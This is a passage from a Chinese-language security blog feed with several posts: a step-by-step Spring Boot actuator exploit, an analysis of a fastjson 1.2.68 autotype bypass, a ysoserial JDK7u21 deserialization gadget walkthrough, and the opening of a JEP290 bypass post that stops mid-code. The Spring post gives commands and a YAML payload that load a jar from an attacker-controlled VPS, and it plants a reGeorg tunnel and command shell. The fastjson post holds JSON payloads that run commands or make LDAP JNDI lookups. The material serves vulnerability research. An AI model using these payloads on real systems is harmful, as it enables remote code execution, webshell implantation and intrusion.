		<category><![CDATA[regeorg]]></category>
		<category><![CDATA[spring]]></category>
		<category><![CDATA[内存shell]]></category>
		<category><![CDATA[审计]]></category>
		<guid isPermaLink="false">/?p=1913</guid>

					<description><![CDATA[项目地址 https://github.com/Y4er/yaml-payload README 利用条件： &#8211; 可以 POST 请求目标网站的 /env 接口设置属性...]]></description>
										<content:encoded><![CDATA[<h1>项目地址</h1>
<p>https://github.com/Y4er/yaml-payload</p>
<h1>README</h1>
<p>利用条件：<br />
&#8211; 可以 POST 请求目标网站的 <code>/env</code> 接口设置属性<br />
&#8211; 可以 POST 请求目标网站的 <code>/refresh</code> 接口刷新配置（存在 <code><span class="wpcom_tag_link"><a href="/tags/spring" title="spring" target="_blank">spring</a></span>-boot-starter-actuator</code> 依赖）<br />
&#8211; 目标依赖的 <code>spring-cloud-starter</code> 版本 &lt; 1.3.0.RELEASE<br />
&#8211; 目标可以请求攻击者的 HTTP 服务器（请求可出外网）</p>
<p>仅在JDK1.8及Spring1.x测试通过,其他版本自测.</p>
<p>利用方法如下：</p>
<h2>编译class文件然后打jar包</h2>
<pre><code class="language-bash line-numbers">cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .
</code></pre>
<h2>托管 yml 和 jar 文件</h2>
<p>在自己控制的<code>vps</code>机器上开启一个简单<code>HTTP</code>服务器，端口尽量使用常见<code>HTTP</code>服务端口（80、443）</p>
<pre><code class="language-bash line-numbers"># 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
</code></pre>
<p>在网站根目录下放置后缀为<code>yml</code>的文件<code>yaml-payload.yml</code>,内容如下:</p>
<pre><code class="language-yaml line-numbers">!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
  ]]
]
</code></pre>
<p>在网站根目录下放置打包好的<code>yaml-payload.jar</code></p>
<h2>设置<code>spring.cloud.bootstrap.location</code>属性</h2>
<pre><code class="line-numbers">POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml
</code></pre>
<h2>刷新配置</h2>
<pre><code class="line-numbers">POST /refresh
Content-Type: application/x-www-form-urlencoded
</code></pre>
<h2>访问注入的shell</h2>
<ol>
<li>reGeorg: http://localhost:9092/api/v1/tunnel</li>
<li>cmd shell: http://localhost:9092/api/v1/game POST:code=whoami</li>
</ol>
<h1>参考</h1>
<ol>
<li>https://github.com/LandGrey/SpringBootVulExploit</li>
<li>https://www.anquanke.com/post/id/198886</li>
<li>https://github.com/artsploit/yaml-payload</li>
</ol>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>fastjson 1.2.68 bypass autotype</title>
		<link>/audit/1803.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 18 Jun 2020 01:09:36 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[fastjson]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1803</guid>

					<description><![CDATA[基于期望类的特性 分析 com.alibaba.fastjson.parser.ParserConfig#checkAutoType(String typeName, Class&#038;...]]></description>
										<content:encoded><![CDATA[<p>基于期望类的特性</p>
<h2>分析</h2>
<p><code>com.alibaba.<span class="wpcom_tag_link"><a href="/tags/fastjson" title="fastjson" target="_blank">fastjson</a></span>.parser.ParserConfig#checkAutoType(String typeName, Class&lt;?&gt; expectClass, int features)</code>方法有三个参数分别是</p>
<ol>
<li>typeName 被序列化的类名</li>
<li>expectClass 期望类</li>
<li>features值</li>
</ol>
<p>具体看下校验过程</p>
<p>首先判断非空和安全模式以及typename长度来决定是否进行autotype。</p>
<pre><code class="language-java line-numbers">        if (typeName == null) {
            return null;
        }

        if (autoTypeCheckHandlers != null) {
            for (AutoTypeCheckHandler h : autoTypeCheckHandlers) {
                Class&lt;?&gt; type = h.handler(typeName, expectClass, features);
                if (type != null) {
                    return type;
                }
            }
        }

        final int safeModeMask = Feature.SafeMode.mask;
        boolean safeMode = this.safeMode
                || (features &amp; safeModeMask) != 0
                || (JSON.DEFAULT_PARSER_FEATURE &amp; safeModeMask) != 0;
        if (safeMode) {
            throw new JSONException("safeMode not support autoType : " + typeName);
        }

        if (typeName.length() &gt;= 192 || typeName.length() &lt; 3) {
            throw new JSONException("autoType is not support. " + typeName);
        }
</code></pre>
<p>然后判断期望类</p>
<pre><code class="language-java line-numbers">        final boolean expectClassFlag;
        if (expectClass == null) {
            expectClassFlag = false;
        } else {
            if (expectClass == Object.class
                    || expectClass == Serializable.class
                    || expectClass == Cloneable.class
                    || expectClass == Closeable.class
                    || expectClass == EventListener.class
                    || expectClass == Iterable.class
                    || expectClass == Collection.class
                    ) {
                expectClassFlag = false;
            } else {
                expectClassFlag = true;
            }
        }
</code></pre>
<p>Object、Serializable、Cloneable、Closeable、EventListener、Iterable、Collection这几个类不能作为expectClass期望类。</p>
<p>然后计算hash进行内部白名单、黑名单匹配</p>
<pre><code class="language-java line-numbers">        String className = typeName.replace('$', '.');
        Class&lt;?&gt; clazz;

        final long BASIC = 0xcbf29ce484222325L;
        final long PRIME = 0x100000001b3L;

        final long h1 = (BASIC ^ className.charAt(0)) * PRIME;
        if (h1 == 0xaf64164c86024f1aL) { // [
            throw new JSONException("autoType is not support. " + typeName);
        }

        if ((h1 ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) {
            throw new JSONException("autoType is not support. " + typeName);
        }

        final long h3 = (((((BASIC ^ className.charAt(0))
                * PRIME)
                ^ className.charAt(1))
                * PRIME)
                ^ className.charAt(2))
                * PRIME;

        long fullHash = TypeUtils.fnv1a_64(className);
        boolean internalWhite = Arrays.binarySearch(INTERNAL_WHITELIST_HASHCODES,  fullHash) &gt;= 0;

        if (internalDenyHashCodes != null) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                hash ^= className.charAt(i);
                hash *= PRIME;
                if (Arrays.binarySearch(internalDenyHashCodes, hash) &gt;= 0) {
                    throw new JSONException("autoType is not support. " + typeName);
                }
            }
        }

        if ((!internalWhite) &amp;&amp; (autoTypeSupport || expectClassFlag)) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                hash ^= className.charAt(i);
                hash *= PRIME;
                if (Arrays.binarySearch(acceptHashCodes, hash) &gt;= 0) {
                    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);
                    if (clazz != null) {
                        return clazz;
                    }
                }
                if (Arrays.binarySearch(denyHashCodes, hash) &gt;= 0 &amp;&amp; TypeUtils.getClassFromMapping(typeName) == null) {
                    if (Arrays.binarySearch(acceptHashCodes, fullHash) &gt;= 0) {
                        continue;
                    }

                    throw new JSONException("autoType is not support. " + typeName);
                }
            }
        }
</code></pre>
<p>如果<code>(!internalWhite) &amp;&amp; (autoTypeSupport || expectClassFlag)</code>不在内部白名单中并且开启autoTypeSupport或者有期望类时，进行hash校验白名单acceptHashCodes、黑名单denyHashCodes，在白名单内就加载，在黑名单中就抛出异常。继续</p>
<pre><code class="language-java line-numbers">        clazz = TypeUtils.getClassFromMapping(typeName);

        if (clazz == null) {
            clazz = deserializers.findClass(typeName);
        }

        if (clazz == null) {
            clazz = typeMapping.get(typeName);
        }

        if (internalWhite) {
            clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);
        }

        if (clazz != null) {
            if (expectClass != null
                    &amp;&amp; clazz != java.util.HashMap.class
                    &amp;&amp; !expectClass.isAssignableFrom(clazz)) {
                throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
            }

            return clazz;
        }
</code></pre>
<p>分别从getClassFromMapping、deserializers.findClass、typeMapping、internalWhite内部白名单中查找类，如果开启了expectClass期望类还要判断类型是否一致。</p>
<p>getClassFromMapping在<code>com.alibaba.fastjson.util.TypeUtils#addBaseClassMappings</code>被赋值，添加了一些基本类，后续会当作缓存使用。<br />
<img src="https://y4er.com/img/uploads/20200616118023.png" alt="image.png" /><br />
这里先注意下<code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.lang.AutoCloseable</code>类。</p>
<p>deserializers.findClass是在<code>com.alibaba.fastjson.parser.ParserConfig#initDeserializers</code>初始化。<br />
<img src="https://y4er.com/img/uploads/20200616119542.png" alt="image.png" /><br />
也是存放了一些特殊类用来直接<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>。</p>
<p>typeMapping默认为空需要开发自己赋值，形如</p>
<pre><code class="language-java line-numbers">ParserConfig.getGlobalInstance().register("test", Model.class);
</code></pre>
<p>internalWhite内部白名单就不说了，到这里已经可以返回类了，通过<code>java.net.Inet6Address</code>、<code>java.net.URL</code>等来判断fastjson也是这个原理。</p>
<p>然后继续走就到了autoTypeSupport的校验。</p>
<pre><code class="language-java line-numbers">        if (!autoTypeSupport) {
            long hash = h3;
            for (int i = 3; i &lt; className.length(); ++i) {
                char c = className.charAt(i);
                hash ^= c;
                hash *= PRIME;

                if (Arrays.binarySearch(denyHashCodes, hash) &gt;= 0) {
                    throw new JSONException("autoType is not support. " + typeName);
                }

                // white list
                if (Arrays.binarySearch(acceptHashCodes, hash) &gt;= 0) {
                    clazz = TypeUtils.loadClass(typeName, defaultClassLoader, true);

                    if (expectClass != null &amp;&amp; expectClass.isAssignableFrom(clazz)) {
                        throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
                    }

                    return clazz;
                }
            }
        }
</code></pre>
<p>黑白名单匹配。</p>
<p>继续判断使用注解JSONType的类</p>
<pre><code class="language-java line-numbers">        boolean jsonType = false;
        InputStream is = null;
        try {
            String resource = typeName.replace('.', '/') + ".class";
            if (defaultClassLoader != null) {
                is = defaultClassLoader.getResourceAsStream(resource);
            } else {
                is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);
            }
            if (is != null) {
                ClassReader classReader = new ClassReader(is, true);
                TypeCollector visitor = new TypeCollector("&lt;clinit&gt;", new Class[0]);
                classReader.accept(visitor);
                jsonType = visitor.hasJsonType();
            }
        } catch (Exception e) {
            // skip
        } finally {
            IOUtils.close(is);
        }
</code></pre>
<p>继续</p>
<pre><code class="language-java line-numbers">        final int mask = Feature.SupportAutoType.mask;
        boolean autoTypeSupport = this.autoTypeSupport
                || (features &amp; mask) != 0
                || (JSON.DEFAULT_PARSER_FEATURE &amp; mask) != 0;

        if (autoTypeSupport || jsonType || expectClassFlag) {
            boolean cacheClass = autoTypeSupport || jsonType;
            clazz = TypeUtils.loadClass(typeName, defaultClassLoader, cacheClass);
        }

        if (clazz != null) {
            if (jsonType) {
                TypeUtils.addMapping(typeName, clazz);
                return clazz;
            }

            if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
                    || javax.sql.DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
                    || javax.sql.RowSet.class.isAssignableFrom(clazz) //
                    ) {
                throw new JSONException("autoType is not support. " + typeName);
            }

            if (expectClass != null) {
                if (expectClass.isAssignableFrom(clazz)) {
                    TypeUtils.addMapping(typeName, clazz);
                    return clazz;
                } else {
                    throw new JSONException("type not match. " + typeName + " -&gt; " + expectClass.getName());
                }
            }

            JavaBeanInfo beanInfo = JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy);
            if (beanInfo.creatorConstructor != null &amp;&amp; autoTypeSupport) {
                throw new JSONException("autoType is not support. " + typeName);
            }
        }
</code></pre>
<p>如果有注解，则加入mapping缓存并直接返回。如果没有注解判断clazz类是否继承或实现classloader、dataSou<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span>、RowSet，抛出异常防止jndi注入。</p>
<p>如果expectClass期望类不为空，则需要加载的类是期望类的子类或实现，并直接返回，否则异常。</p>
<p>如果类使用<code>JSONCreator</code>注解并且开启autoTypeSupport，抛出异常。</p>
<p>最后就是判断是否开启autoTypeSupport特性，将clazz添加进缓存，并且return clazz。</p>
<pre><code class="language-java line-numbers">        if (!autoTypeSupport) {
            throw new JSONException("autoType is not support. " + typeName);
        }

        if (clazz != null) {
            TypeUtils.addMapping(typeName, clazz);
        }
</code></pre>
<p>可以看到主要有如下种情况可以直接返回class</p>
<p>TypeUtils.mappings mappings缓存1.2.47中就被绕过了一次autotype。而这次绕过是在于<code>exceptClass</code>期望类这个功能。</p>
<p>期望类的功能主要是实现/继承了期望类的class能被反序列化出来（并且不受autotype影响），寻找checkAutoType方法的调用，要求exceptClass不为空。</p>
<p><img src="https://y4er.com/img/uploads/20200616112778.png" alt="image.png" /></p>
<p>只有两个类<code>JavaBeanDeserializer</code>、<code>ThrowableDeserializer</code>中调用了checkAutoType并且exceptClass不为空。</p>
<p>在<code>com/alibaba/fastjson/parser/ParserConfig.java:826</code>中对一些基本的类型设置了对应的反序列化实例deserializer<br />
<img src="https://y4er.com/img/uploads/20200616112730.png" alt="image.png" /><br />
ThrowableDeserializer是Throwable用来反序列化异常类的，当没有命中之前程序给定的类型时会进入createJavaBeanDeserializer()，其实就是JavaBeanDeserializer。</p>
<p>先看ThrowableDeserializer中<br />
<img src="https://y4er.com/img/uploads/20200616111164.png" alt="image.png" /></p>
<p>根据第二个<code>@type</code>获取类，并且传入指定期望类进行加载。因此可以反序列化继承Throwable的异常类，借助setter、getter等方法的自动调用，来挖掘gadget。浅蓝师傅给了一个gadget</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.IOException;

public class ExecException extends Exception {

    private String domain;

    public ExecException() {
        super();
    }

    public String getDomain() {
        return domain;
    }

    public void setDomain(String domain) {
        this.domain = domain;
    }

    @Override
    public String getMessage() {
        try {
            Runtime.getRuntime().exec(new String[]{"cmd", "/c", "ping " + domain});
        } catch (IOException e) {
            return e.getMessage();
        }

        return super.getMessage();
    }
}
</code></pre>
<p>提交json触发rce</p>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.Exception",
  "@type": "org.chabug.fastjson.exploit.ExecException",
  "domain": "y4er.com | calc"
}
</code></pre>
<p>当然很少有开发者把命令执行写道异常类处理中，所以Throwable鸡肋。</p>
<p>再来看JavaBeanDeserializer，在fastjson中对大部分类都指定了特定的deserializer，而AutoCloseable类没有，通过继承/实现AutoCloseable的类可以绕过autotype反序列化。场景如下：</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.Closeable;
import java.io.IOException;

public class ExecCloseable implements Closeable {
    private String domain;

    public ExecCloseable() {
    }

    public ExecCloseable(String domain) {
        this.domain = domain;
    }

    public String getDomain() {
        try {
            Runtime.getRuntime().exec(new String[]{"cmd", "/c", "ping " + domain});
        } catch (IOException e) {
            e.printStackTrace();
        }
        return domain;
    }

    public void setDomain(String domain) {
        this.domain = domain;
    }

    @Override
    public void close() throws IOException {

    }
}
</code></pre>
<p>提交json触发rce</p>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.AutoCloseable",
  "@type": "org.chabug.fastjson.exploit.ExecCloseable",
  "domain": "y4er.com | calc"
}
</code></pre>
<p>fastjson在黑名单中还加上了java.lang.Runnable、java.lang.Readable，这个利用场景拿Runnable举个例子</p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import java.io.IOException;

public class ExecRunnable implements AutoCloseable {
    private EvalRunnable eval;

    public EvalRunnable getEval() {
        return eval;
    }

    public void setEval(EvalRunnable eval) {
        this.eval = eval;
    }

    @Override
    public void close() throws Exception {

    }
}

class EvalRunnable implements Runnable {
    private String cmd;

    public String getCmd() {
        System.out.println("EvalRunnable getCmd() "+cmd);
        try {
            Runtime.getRuntime().exec(new String[]{"cmd","/c",cmd});
        } catch (IOException e) {
            e.printStackTrace();
        }
        return cmd;
    }

    public void setCmd(String cmd) {
        this.cmd = cmd;
    }

    @Override
    public void run() {

    }
}
</code></pre>
<pre><code class="language-java line-numbers">{
  "@type":"java.lang.AutoCloseable",
  "@type": "org.chabug.fastjson.exploit.ExecRunnable",
  "eval":{"@type":"org.chabug.fastjson.exploit.EvalRunnable","cmd":"calc"}
}
</code></pre>
<p>Readable同理。</p>
<p>拓展使用$ref拓展攻击面，使用parse()解析的也能触发任意getter。这个payload来自 <a class="wp-editor-md-post-content-link" href="https://github.com/threedr3am/learnjavabug/commit/ea61297cf7b2125ecae0064d2b8061a9e32db1e6">@threedr3am</a></p>
<pre><code class="language-java line-numbers">package org.chabug.fastjson.exploit;

import com.alibaba.fastjson.JSON;
import org.apache.shiro.jndi.JndiLocator;
import org.apache.shiro.util.Factory;

import javax.naming.NamingException;

public class RefAnyGetterInvoke&lt;T&gt; extends JndiLocator implements Factory&lt;T&gt;, AutoCloseable {
    private String resourceName;

    public RefAnyGetterInvoke() {
    }

    public static void main(String[] args) {
        String json = "{\n" +
                "  \"@type\":\"java.lang.AutoCloseable\",\n" +
                "  \"@type\": \"org.chabug.fastjson.exploit.RefAnyGetterInvoke\",\n" +
                "  \"resourceName\": \"ldap://localhost:1389/Calc\",\n" +
                "  \"instance\": {\n" +
                "    \"$ref\": \"$.instance\"\n" +
                "  }\n" +
                "}";
        System.out.println(json);
        JSON.parse(json);   // 默认不会调用getter 使用$ref就可以调用到getInstance()
//        JSON.parseObject(json); // parseObject默认就会调用getter getInstance()
    }

    public T getInstance() {
        System.out.println(getClass().getName() + ".getInstance() invoke.");
        try {
            return (T) this.lookup(this.resourceName);
        } catch (NamingException var3) {
            throw new IllegalStateException("Unable to look up with jndi name '" + this.resourceName + "'.", var3);
        }
    }

    public String getResourceName() {
        System.out.println(getClass().getName() + ".getResourceName() invoke.");
        return this.resourceName;
    }

    public void setResourceName(String resourceName) {
        System.out.println(getClass().getName() + ".setResourceName() invoke.");
        this.resourceName = resourceName;
    }

    @Override
    public void close() throws Exception {

    }
}
</code></pre>
<h2>gadget</h2>
<pre><code class="language-java line-numbers"> if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
                    || javax.sql.DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
                    || javax.sql.RowSet.class.isAssignableFrom(clazz) //
                    ) {
                throw new JSONException("autoType is not support. " + typeName);
            }
</code></pre>
<p>因为这几行代码的限制，大部分的JNDI gadget都不能用了，需要找到一条基于AutoCloseable的新gadget。浅蓝师傅给的思路是挖掘文件读写操作。我还在挖掘中，欢迎各位师傅交流。</p>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ysoserial JDK7u21</title>
		<link>/audit/1799.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 10 Jun 2020 03:21:11 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[jdk]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[ysoserial]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1799</guid>

					<description><![CDATA[0^anything=anything 环境 jdk7u21 ysoserial idea 复现 package ysoserial.mytest; import ysoseria...]]></description>
										<content:encoded><![CDATA[<p>0^anything=anything</p>
<h2>环境</h2>
<p><span class="wpcom_tag_link"><a href="/tags/jdk" title="jdk" target="_blank">jdk</a></span>7u21 <span class="wpcom_tag_link"><a href="/tags/ysoserial" title="ysoserial" target="_blank">ysoserial</a></span> idea</p>
<h2>复现</h2>
<p><img src="https://y4er.com/img/uploads/20200610111235.png" alt="image.png" /></p>
<pre><code class="language-java line-numbers">package ysoserial.mytest;

import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public class JDK7u21 {
    public static void main(String[] args) {
        try {
            Object calc = new Jdk7u21().getObject("calc");

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();//用于存放person对象序列化byte数组的输出流

            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(calc);//序列化对象
            objectOutputStream.flush();
            objectOutputStream.close();

            byte[] bytes = byteArrayOutputStream.toByteArray(); //读取序列化后的对象byte数组

            ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);//存放byte数组的输入流

            ObjectInputStream objectInputStream = new ObjectInputStream(byteArrayInputStream);
            Object o = objectInputStream.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<h2>分析</h2>
<p>首先简单两行代码<span class="wpcom_tag_link"><a href="/tags/rce" title="rce" target="_blank">rce</a></span></p>
<pre><code class="language-java line-numbers">TemplatesImpl object = (TemplatesImpl) Gadgets.createTemplatesImpl("calc");
object.getOutputProperties();
</code></pre>
<p><img src="https://y4er.com/img/uploads/20200610115520.png" alt="image.png" /></p>
<p>createTemplatesImpl 是使用 <span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>ssist 动态的添加的恶意 java 代码，初始化时自动执行，之前的文章中说过，getOutputProperties()中调用newTransformer()<br />
<img src="https://y4er.com/img/uploads/20200610114926.png" alt="image.png" /></p>
<p>调用了getTransletInstance()<br />
<img src="https://y4er.com/img/uploads/20200610115760.png" alt="image.png" /></p>
<p>getTransletInstance()中将恶意字节码加载进来并且new实例，在实例化时rce。<br />
<img src="https://y4er.com/img/uploads/20200610110173.png" alt="image.png" /></p>
<p>现在的问题就是如何<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>自动调用getOutputProperties，把yso的payload抠出来</p>
<pre><code class="language-java line-numbers">    public Object getObject(final String command) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(command);

        String zeroHashCodeStr = "f5a5a608";

        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");

        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);

        LinkedHashSet set = new LinkedHashSet(); // maintain order
        set.add(templates);
        set.add(proxy);

        Reflections.setFieldValue(templates, "_auxClasses", null);
        Reflections.setFieldValue(templates, "_class", null);

        map.put(zeroHashCodeStr, templates); // swap in real object
        return set;
    }
</code></pre>
<p>map先是存了一个<code>f5a5a608=foo</code>，然后f5a5a608值改为TemplatesImpl恶意对象</p>
<p>set对象存放了TemplatesImpl恶意对象和Templates的动态代理对象</p>
<p><img src="https://y4er.com/img/uploads/20200610119092.png" alt="image.png" /></p>
<p>LinkedHashSet继承HashSet，其readObject在HashSet中<br />
<img src="https://y4er.com/img/uploads/20200610113776.png" alt="image.png" /></p>
<p>在该readObjcet中会将反序列化的对象put()放入map中（HashSet本质是HashMap），先添加templates再添加proxy。在put()第二次添加proxy的时候，map中已经有了一个TemplatesImpl<br />
<img src="https://y4er.com/img/uploads/20200610115905.png" alt="image.png" /><br />
所以会拿上一个Entry的key做比较，当key对象相等时新值替换旧值，返回旧值。</p>
<pre><code class="language-java line-numbers">e.hash == hash &amp;&amp; ((k = e.key) == key || key.equals(k))
</code></pre>
<p>问题就出在<code>key.equals(k)</code>，但是要想进入equals方法需要满足前面的几个短路条件</p>
<ol>
<li>e.hash == hash 为真</li>
<li>(k = e.key) == key 为假</li>
</ol>
<p>e.hash是在生成payload的时候<code>set.add(proxy)</code>计算的，贴一下堆栈</p>
<pre><code class="language-java line-numbers">hashCodeImpl:293, AnnotationInvocationHandler (sun.reflect.annotation)
invoke:64, AnnotationInvocationHandler (sun.reflect.annotation)
hashCode:-1, $Proxy0 (com.sun.proxy)
hash:351, HashMap (java.util)
put:471, HashMap (java.util)
add:217, HashSet (java.util)
getObject:84, Jdk7u21 (ysoserial.payloads)
rce:21, JDK7u21 (ysoserial.mytest)
main:16, JDK7u21 (ysoserial.mytest)
</code></pre>
<p>在java.util.HashMap#put添加键值的时候会计算对象hash，走了一个hash(key)函数<br />
<img src="https://y4er.com/img/uploads/20200610110429.png" alt="image.png" /></p>
<p>而key此时是proxy动态代理对象，要调用它的hashCode()函数需要走动态代理的invoke接口，当调用方法名为hashCode时，会进入hashCodeImpl()<br />
<img src="https://y4er.com/img/uploads/20200610117633.png" alt="image.png" /></p>
<pre><code class="language-java line-numbers">    private int hashCodeImpl() {
        int var1 = 0;

        Entry var3;
        for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.hasNext(); var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) {
            var3 = (Entry)var2.next();
        }

        return var1;
    }
</code></pre>
<p>这个方法遍历memberValues这个map对象，然后做了</p>
<pre><code class="language-java line-numbers">v += 127 * (key).hashCode() ^ memberValueHashCode(value);
</code></pre>
<p><code>memberValueHashCode()</code>直接返回<code>var0.hashCode()</code>，也就是直接返回原本对象的hashcode，但是还要走一次亦或，所以要让<code>127 * (key).hashCode()=0</code>，而key为<code>f5a5a608</code>，他的hashcode刚好为0，到这里不得不惊叹作者的巧妙。</p>
<blockquote><p>
  拓展: 空字符串和<code>\u0000</code>的hashCode都为0
</p></blockquote>
<p><img src="https://y4er.com/img/uploads/20200610119892.png" alt="image.png" /></p>
<p>e.hash==hash其实就是拿proxy代理的<code>@javax.xml.transform.Templates(f5a5a608=foo)</code>对象的hash和之前计算的自身hash做比较，结果当然为true。</p>
<p><code>(k = e.key) == key</code>拿proxy对象和Templates比较肯定为false。</p>
<p>走到key.equals(k)这一步，也就是<code>proxy.equals(templates)</code>。同理调用proxy的equals函数需要通过invoke接口走<br />
<img src="https://y4er.com/img/uploads/20200610113803.png" alt="image.png" /></p>
<p>然后<br />
<img src="https://y4er.com/img/uploads/20200610113821.png" alt="image.png" /></p>
<p>getMemberMethods()取出两个无参方法<br />
<img src="https://y4er.com/img/uploads/20200610114904.png" alt="image.png" /></p>
<p>在这调用了getOutputProperties()，回到上文的rce流程就串起来了。</p>
<h2>修复</h2>
<pre><code class="language-java line-numbers">    AnnotationInvocationHandler(Class&lt;? extends Annotation&gt; var1, Map&lt;String, Object&gt; var2) {
        Class[] var3 = var1.getInterfaces();
        if (var1.isAnnotation() &amp;&amp; var3.length == 1 &amp;&amp; var3[0] == Annotation.class) {
            this.type = var1;
            this.memberValues = var2;
        } else {
            throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");
        }
    }
</code></pre>
<p>对于this.type进行了校验必须为Annotation.class</p>
<h2>参考</h2>
<ol>
<li>https://mp.weixin.qq.com/s/qlg3IzyIc79GABSSUyt-OQ</li>
<li>https://b1ue.cn/archives/176.html</li>
<li>https://xz.aliyun.com/t/6884</li>
<li>https://b1ngz.github.io/java-deserialization-jdk7u21-gadget-note/</li>
</ol>
<p><strong>文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。</strong></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Bypass JEP290</title>
		<link>/audit/1791.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 29 May 2020 03:32:29 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[RMI]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1791</guid>

					<description><![CDATA[关于JEP290 JEP290是Java底层为了缓解反序列化攻击提出的一种解决方案，主要做了以下几件事 提供一个限制反序列化类的机制，白名单或者黑名单。 限制反序列化的深度和复杂度...]]></description>
										<content:encoded><![CDATA[<h2>关于JEP290</h2>
<p>JEP290是Java底层为了缓解<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>攻击提出的一种解决方案，主要做了以下几件事</p>
<ol>
<li>提供一个限制反序列化类的机制，白名单或者黑名单。</li>
<li>限制反序列化的深度和复杂度。</li>
<li>为<span class="wpcom_tag_link"><a href="/tags/rmi" title="RMI" target="_blank">RMI</a></span>远程调用对象提供了一个验证类的机制。</li>
<li>定义一个可配置的过滤机制，比如可以通过配置properties文件的形式来定义过滤器。</li>
</ol>
<h2>JEP290的实际限制</h2>
<p>写一个RMIServer</p>
<p>RMIServer.<span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span></p>
<pre><code class="language-java line-numbers">package org.chabug.rmi.server;

import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;

public class RMIServer {
    public static String HOST = "127.0.0.1";
    public static int PORT = 1099;
    public static String RMI_PATH = "/hello";
    public static final String RMI_NAME = "rmi://" + HOST + ":" + PORT + RMI_PATH;

    public static void main(String[] args) {
        try {
            // 注册RMI端口
            LocateRegistry.createRegistry(PORT);
            // 创建一个服务
            Hello hello = new HelloImpl();
            // 服务命名绑定
            Naming.rebind(RMI_NAME, hello);

            System.out.println("启动RMI服务在" + RMI_NAME);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p>HelloImpl.java</p>
<pre><code class="language-java line-numbers">package org.chabug.rmi.server;

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;

public class HelloImpl extends UnicastRemoteObject implements Hello {
    protected HelloImpl() throws RemoteException {
    }

    public String hello() throws RemoteException {
        return "hello world";
    }

    public String hello(String name) throws RemoteException {
        return "hello" + name;
    }

